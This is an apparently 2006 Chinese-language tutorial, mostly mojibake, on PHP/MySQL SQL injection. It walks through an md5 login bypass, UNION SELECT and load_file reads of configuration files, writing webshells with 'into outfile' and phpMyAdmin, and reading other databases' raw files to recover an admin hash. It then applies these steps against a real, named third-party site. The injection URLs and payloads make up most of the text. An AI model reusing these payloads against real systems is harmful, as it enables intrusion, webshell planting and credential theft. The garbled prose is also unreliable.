¶¯ÍøÂÛ̳£¬Õ¾³¤½¨Õ¾Ê×Ñ¡£¬¹úÄÚʹÓÃÁ¿×î¶àµÄÂÛ̳Èí¼þ ¶¯ÍøÂÛ̳¹Ù·½¼¼ÊõÌÖÂÛÇø Õ¾³¤¹¤¾ß ÉêÇëÊôÓÚÄú×Ô¼ºµÄÃâ·ÑÂÛ̳
Ê×Ò³ | ÐÂÎÅ×ÊѶ | ÍøÕ¾ÔËÓª | ÍøÂç±à³Ì | Êý¾Ý¿â | ·þÎñÆ÷ | ÍøÒ³Éè¼Æ | ͼÏñýÌå | ÍøÂçÓ¦Óà | ËÑË÷ÓÅ»¯ | ×ÊÔ´ÏÂÔØ | ¶¯ÍøÖ÷»ú | DVBOX
    ±¾Õ¾ÄÚ  »¥ÁªÍø ASPÂÛ̳  ASP.NetÂÛ̳  PHPÂÛ̳
   PHP ¡ú ÔĶÁÎÄÕÂ

 php×¢Èë4

×÷Õߣº À´Ô´£º 
ÔĶÁ 1959 È˴Π, 2006-4-19 9:47:00 


¡¡¡¡ 4.    md5µÄ¶ñÃÎ
ɽ¶«´óѧµÄÍõ²©Ê¿×î½ü¿ÉÊǸãmd5¸ãµÄºì͸ÁË£¬ÎÒÃÇÒ²À´¸ãÒ»¸ã°É£¬ÎÒÃDZÈËû¸üˬ£¬²»ÓüÆË㣬¹þ¹þ¡£
md5ÎÒÃÇÊÇÓÐ°ì·¨ÈÆ¹ýµÄ£¬µ«ÊDz¢²»ÊÇÄÄÀï¶¼¿ÉÒÔ£¬phpÖеÄmd5º¯Êý¾Í²»ÄÜÈÆ¹ý£¬ÒòΪÄãÊäÈëµÄËùÓж«Î÷¶¼ÔÚÀïÃæ£¬¸ù±¾Åܲ»³ö¡£¿ÉÒÔÈÆ¹ýµÄÊÇsqlÓï¾äÖеÄmd5¡£µ±È»±ðµÄsqlÖеĺ¯ÊýÒ²ÊÇ¿ÉÒÔÈÆ¹ýµÄ£¬µÀÀíÏàͬŶ¡£
¿´Àý×ÓÏÈ£º
//login.php
......
$query="select * from alphaauthor where UserName=md5($username) and Password= ".$Pw." ";
......
?>
ÎÒÃÇÖ±½ÓÔÚä¯ÀÀÆ÷Ìá½»
http:/login.php?username=char(97,98)) or 1=1 %23
´øÈësqlÓï¾ä³ÉΪselect * from alphaauthor where UserName=md5(char(97,98)) or 1=1 #) and Password= ".$Pw."
¼ÇµÃmd5ÀïÃæ·ÅµÄÊÇ×Ö·û£¬ÒòΪºóÃæÓÐor 1=2£¬ËùÒÔÎÒÃÇËæ±ã·ÅÁ˸öchar(97,98).    Ok£¬µÇ½³É¹¦ÁËŶ£¡¿´¿´£¬md5ÔÚÎÒÃÇÃæÇ°Ò²Ã»ÓÐʲôÓô¦¡£
5.    ºËÐļ¼Êõ£¬ÀûÓÃphp+mysql×¢Èë©¶´Ö±½ÓдÈëwebshell¡£¡£
Ö±½ÓÀûÓÃ×¢ÈëµÃµ½webshell£¬ÕâÓ¦¸ÃÊÇ´ó¼Ò¶¼ºÜÏëµÄ°É£¬ÏÂÃæ¾Í½Ì¸øÄã¡£
ÕâÀï¼ÙÉèÄãÒѾ­ÖªµÀÁËÍøÕ¾ËùÔÚµÄÎïÀí·¾¶£¬ÎÒÕâÀï¼ÙÉèÍøÕ¾Â·¾¶Îªc:/apache/htdocs/site¡£ÍøÕ¾µÄmysqlÁ¬½ÓÐÅÏ¢·ÅÔÚ/lib/sql.inc.phpÀï
1£©ÊÊÓÃÓÚmagic_quotes_gpc£½Off
¼ÙÉèÎÒÃÇ¿ÉÒÔÉÏ´«Í¼Æ¬£¬»òÕßtxt£¬zip£¬µÈÆäËü¶«Î÷£¬ÎÒÃǰÑÎÒÃǵÄľÂí¸Ä³É
jpgºó׺µÄ£¬ÉÏ´«ºó·¾¶Îª/upload/2004091201.jpg
2004091201.jpgÖеÄÄÚÈÝΪ
ºÃ£¬ÎÒÃÇ¿ªÊ¼http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file( C:/apache/htdocs/site/upload/2004091201.jpg ),4,5,6,7,8,9,10,11%20into%20outfile C:/apache/htdocs/site/shell.php
ÒòΪÊÊÓÃÁËoutfile£¬ËùÒÔÍøÒ³ÏÔʾ²»Õý³££¬µ«ÊÇÎÒÃǵÄÈÎÎñÊÇÍê³ÉÁË¡£
Èçͼ28
ÎÒÃǸϿìÈ¥¿´¿´http://localhost/site/shell.php?cmd=dir
Èçͼ29

ˬ·ñ£¿WebshellÎÒÃÇÒѾ­´´½¨³É¹¦ÁË¡£¿´µ½×îÇ°ÃæµÄ12ÁËû£¿ÄǾÍÊÇÎÒÃÇselect 1£¬2ËùÊä³öµÄ£¡
2£©ÏÂÃæÔÙ½²Ò»¸öÊÊÓÃÓÚmagic_quotes_gpc£½OnµÄʱºò±£´æwebshellµÄ·½·¨Å¶£¬ÏÔÈ»¿Ï¶¨Ò²ÄÜÓÃÔÚÓÚmagic_quotes_gpc£½OffµÄʱºòÀ²¡£
ÎÒÃÇÖ±½Ó¶ÁËûµÄÅäÖÃÎļþ£¬Óü¼ÇÉ2½éÉܵķ½·¨
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870)
,4,5,6,7,8,9,10,11
µÃµ½sql.inc.phpÄÚÈÝΪ

ºÃÁËÎÒÃÇÖªµÀÁËmysqlµÄrootÃÜÂëÁË£¬ÎÒÃÇÕÒµ½phpmyadminµÄºǫ́
http://localhost/phpmyadmin/
ÓÃrootÃÜÂëΪ¿ÕµÇ½¡£
Èçͼ30
È»ºóÎÒÃÇн¨Á¢Ò»¸ö±í½á¹¹ÄÚÈÝÈçÏ£º

#
# Êý¾Ý±íµÄ½á¹¹ `te`
#
CREATE TABLE te (
  cmd text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

#
# µ¼³öÏÂÃæµÄÊý¾Ý¿âÄÚÈÝ `te`
#
INSERT INTO te VALUES ( );
Ok£¬ÊÇÎÒÃÇÓÃselect * from table into outfile µÄʱºòÁË
Ö±½ÓÔÚphpmyadminµÄsqlÊäÈë
SELECT * FROM `te` into outfile C:/apache/htdocs/site/cmd1.php ;
Èçͼ31

Ok£¬³É¹¦Ö´ÐУ¬ÎÒÃÇÈ¥http://localhost/site/cmd1.php?cmd=dir¿´¿´Ð§¹ûÈ¥
Èçͼ32

ºÃˬµÄÒ»¸öwebshellÊǰɣ¡¹þ¹þ£¬ÎÒÒ²ºÜϲ»¶¡£
²»¹ý²»ÖªµÀ´ó¼ÒÓÐûÓз¢ÏÖÎÒÃÇÊÇÔÚmagic_quotes_gpc£½OnµÄÇé¿öÏÂÍê³ÉÕâÏ×÷µÄ£¬¾¹È»ÔÚphpmyadminÀï¿ÉÒÔ²»Óÿ¼ÂÇÒýºÅµÄÏÞÖÆ£¬¹þ¹þ£¬ËµÃ÷ʲô£¿ËµÃ÷phpmyadmin̫ΰ´óÁË£¬ÕâÒ²¾ÍÊÇÎÒÃÇÔÚ̸magic_quotes_gpc£½OnÈÆ¹ýʱËùÂôµÄÄǸö¹Ø×ÓÀ²£¡
6.·¢ÏÖûÓÐÎÒÃÇ»¹¿ÉÒÔÀûÓÃupdateºÍinsertÀ´²åÈëÎÒÃǵÄÊý¾Ý£¬È»ºóÀ´µÃµ½ÎÒÃǵÄwebshellŶ£¬»¹ÓÃÉÏÃæµÄÄǸöÀý×Ó£¬
//reg.php
......
$query = "INSERT INTO members
VALUES( $id , $login , $pass , $email , 2 )" ;
......
?>
ÎÒÃÇÔÚemailµÄµØ·½ÊäÈë
¼ÙÉèÎÒÃÇ×¢²áºóµÄidΪ10
ÄÇôÎÒÃÇ¿ÉÒÔÔÙÕÒµ½Ò»¸ö¿ÉÒÔ×¢ÈëµÄµØ·½
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,email,4,5,6,7,8,9,10,11%20from%20user%20where%20id=10%20 into%20outfile C:/apache/htdocs/site/test.php
ºÃÁË£¬ÎÒÃÇÓÖÓÐÁËÎÒÃǵÄwenshellÁËŶ¡£
7.mysqlµÄ¿ç¿â²éѯ
´ó¼ÒÊDz»ÊÇÒ»Ö±Ìý˵mysql²»ÄÜ¿ç¿â²éѯ°¡£¬¹þ¹þ£¬½ñÌìÎÒ½«Òª½Ì´ó¼ÒÒ»¸öºÃ·½·¨£¬Í¨¹ýÕâ¸ö·½·¨À´ÊµÏÖ±äÏàµÄ¿ç¿â²éѯ£¬·½·¨¾ÍÊÇͨ¹ýload_fileÀ´Ö±½Ó¶Á³ömysqlÖÐdat

aÎļþ¼ÐϵÄÎļþÄÚÈÝ£¬´Ó¶øÊµÏÖ±ä̬¿ç¿â²éѯ¡£
¾Ù¸öÀý×ÓÀ²
ÔÚÕâ֮ǰÎÒÃÇÏȽ²Ò»ÏÂmysqlµÄdataÎļþ¼ÐϵĽṹ
DataÎļþ¼ÐÏÂÓа´Êý¾Ý¿âÃûÉú³ÉµÄÎļþ¼Ð£¬Îļþ¼Ðϰ´ÕÕ±íÃûÉú³ÉÈý¸öºó׺Ϊfrm,myd,myiµÄÈý¸öÎļþ£¬ÀýÈç
MysqlÖÐÓÐalphaÊý¾Ý¿â£¬ÔÚalpha¿âÖÐÓÐalphaauthorºÍalphadbÁ½¸ö±í£¬
AlphaÎļþ¼ÐÄÚÈÝÈçÏÂͼ33

ÆäÖÐalphadb.frm·Å×Ålphadb±íÖеÄÊý¾Ý£¬alphadb.frm·Å×űíµÄ½á¹¹£¬alphadb.myiÖзŵÄÄÚÈÝËæmysqlµÄ°æ±¾²»Í¨»áÓÐËù²»Í¬£¬¾ßÌå¿ÉÒÔ×Ô¼ºÓüÇʱ¾´ò¿ªÀ´Åжϡ£
ʵÑ鿪ʼ
¼ÙÉèÎÒÃÇÖªµÀÓÐÁíÍâµÄÒ»¸öÊý¾Ý¿âyminfo210´æÔÚ£¬ÇÒ´æÔÚ±íuser£¬userÖзÅÕâadminµÄÐÅÏ¢¡£
ÎÒÃÇ
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file( yminfo210/user.myd ),4,5,6,7,8,9,10,11
˵Ã÷һϣ¬load_fileĬÈÏËùÔÚµÄĿ¼ÊÇmysqlϵÄdataĿ¼£¬ËùÒÔÎÒÃÇÓÃ
load_file( yminfo210/user.myd )£¬µ±È»load_file( .info210/user.myd )Ò²ÊÇÒ»ÑùµÄ£¬×¢ÒâµÄÊÇinto outfileµÄĬÈÏ·¾¶ÊÇÔÚËùÔÚµÄÊý¾Ý¿âÎļþ¼ÐÏ¡£

½á¹ûÈçͼ34

ÎÒÃÇ¿´¶Á³öÀ´µÄÄÚÈÝ
Å|ÿÿ?   admin 698d51a19d8a121ce581499d7b701668 admin@yoursite.comadmin question admin answer  http://www.yoursite.com  (?ì[?ûûKAì[?ì[?  127.0.0.1  d|?ÿ?  aaa 3dbe00a167653a1aaee01d93e77e730e sdf@sd.com sdfasdfsdfa asdfadfasd   ?EüKAMüKA 127.0.0.1 222  222222223423
ËäÈ»ÂÒÂëÒ»¶Ñ£¬µ«ÊÇÎÒÃÇ»¹ÊÇ¿ÉÒÔ¿´³öÓû§ÃûÊÇadmin£¬ÃÜÂëÊÇ698d51a19d8a121ce581499d7b701668£¬ºóÃæÆäËüµÄÊÇÁíÍâµÄÐÅÏ¢¡£
ͨ¹ýÕâÖÖ·½·¨ÎÒÃǾÍʵÏÖÁËÇúÏß¿ç¿â£¬ÏÂÃæµÄÀý×ÓÖÐÒ²»áÌᵽŶ£¡

˵ÁËÕâô¶àÏÂÃæÎÒÃÇÀ´¾ßÌåµÄʹÓÃÒ»´Î£¬Õâ´Î²âÊԵĶÔÏóÊǹúÄÚÒ»ÖøÃû°²È«ÀàÕ¾µã¨D¨DºÚ°×ÍøÂç
ÌýÈ˼Ò˵ºÚ°×ÓЩ¶´£¿ÎÒÃÇÒ»ÆðÈ¥¿´¿´°É¡£
http://www.heibai.net/down/show.php?id=5403%20and%201=1
Õý³£ÏÔʾ¡£
Èçͼ35

http://www.heibai.net/down/show.php?id=5403%20and%201=2
ÏÔʾ²»Õý³£¡£
Èçͼ36

ºÃ£¬ÎÒÃǼÌÐø
http://www.heibai.net/down/show.php?id=5403%20and%201=1 union select 1
ÏÔʾ½á¹ûÈçÏÂ
Èçͼ37

×¢Ò⿴ͼÖÐûÓÐÏÔʾ³ÌÐòÃû£¬¶øÇÒ»¹¸½´øÁË
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\show.php on line 45

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\global.php on line 578

ÔÎÁË£¬ÍøÕ¾Â·¾¶³öÀ´ÁË£¬ÄǿɾÍËÀ¶¨ÁËŶ£¡
ÎÒÃǼÌÐø£¬Ö±µ½ÎÒÃDzµ½
http://www.heibai.net/down/show.php?id=5403%20and%201=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
µÄʱºòÕý³£ÏÔʾÁË¡£
Èçͼ38

ºÃÎÒÃÇת»»Óï¾ä³ÉΪ
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
ÏÔʾÈçͼ39

¿´¿´¼ò½é´¦ÏÔʾΪ12£¬ÎÒÃÇ¿ÉÒԲ²â´Ë´¦Ó¦¸ÃΪ×Ö·ûÐÍ£¡
Ok£¬ÎÒÃÇÏÂÃæ¿´¿´ÎļþÄÚÈÝÏÈ
D:/web/heibai/down/show.phpת»¯³ÉasciiºóΪ
char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,
104,111,119,46,112,104,112)
ÎÒÃÇ
view-source:http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,
111,119,46,112,104,112)),13,14,15,16,17,18,19
view-source:ÊÇÖ¸²ì¿´Ô´´úÂ룬ÖÁÓÚΪʲôÓã¬ÎÒÃǺóÃæ½«½²µ½
ÏÔʾ³öËüµÄÔ´´úÂë
Èçͼ40

ÒòΪÔÚshow.phpÖÐÓÐÒ»¾ä

Èç¹ûÎÒÃÇÖ±½ÓÔÚä¯ÀÀÆ÷ÀïÌá½»»áÌø×ªµ½list.php
ÎÒÃÇ·¢ÏÖÕâ¾ärequire ("./include/config.inc.php");
ºÃ¶«Î÷£¬Ó¦¸Ã·ÅÕâÅäÖÃÎļþ£¬ok¼ÌÐø
d:/web/heibai/down/include/config.inc.php
ת»¯³Échar(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105
,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)
ÎÒÃÇÊäÈë

¡¡¡¡
 ±¾ÎÄTags£º×¢Èë  
 Êղر¾ÎÄ  ´òÓ¡±¾ÎÄ  ÂÛ̳ÌÖÂÛ  ¹Ø±Õ´°¿Ú
¡¤ ÉÏһƪ£ºÉÏ´«¶à¸öÎļþµÄPHP½Å±¾
¡¤ ÏÂһƪ£ºphp×¢Èë3
¡¤ PHPÖеÄÕý¹æ±í´ïʽ
¡¤ ÖØÔØ -- Classes and Objects in PHP5
¡¤ ËÑË÷ÒýÇæ¼¼ÊõºËÐĽÒÃÜ(PHP)
¡¤ MySQLÒÔËÙ¶ÈΪĿ±ê(zt)
¡¤ ¿ÉÕÛµþ´ó¸Ù²âÊÔÀý


¹ØÓÚ±¾Õ¾¡¡|¡¡ÁªÏµÎÒÃÇ¡¡|¡¡ÒµÎñºÏ×÷¡¡|¡¡¿Í»§°¸Àý¡¡|¡¡³ÏƸӢ²Å¡¡|¡¡¹ã¸æºÏ×÷¡¡|¡¡Êղر¾Õ¾
º£¿Ú¶¯ÍøÏÈ·æÍøÂç¿Æ¼¼ÓÐÏÞ¹«Ë¾°æÈ¨ËùÓÐ
Copyright © 2000 - 2006 Cndw.Com
ÖлªÈËÃñ¹²ºÍ¹úµçÐÅÓëÐÅÏ¢·þÎñÒµÎñ¾­ÓªÐí¿ÉÖ¤±àºÅ Çí ICP 020077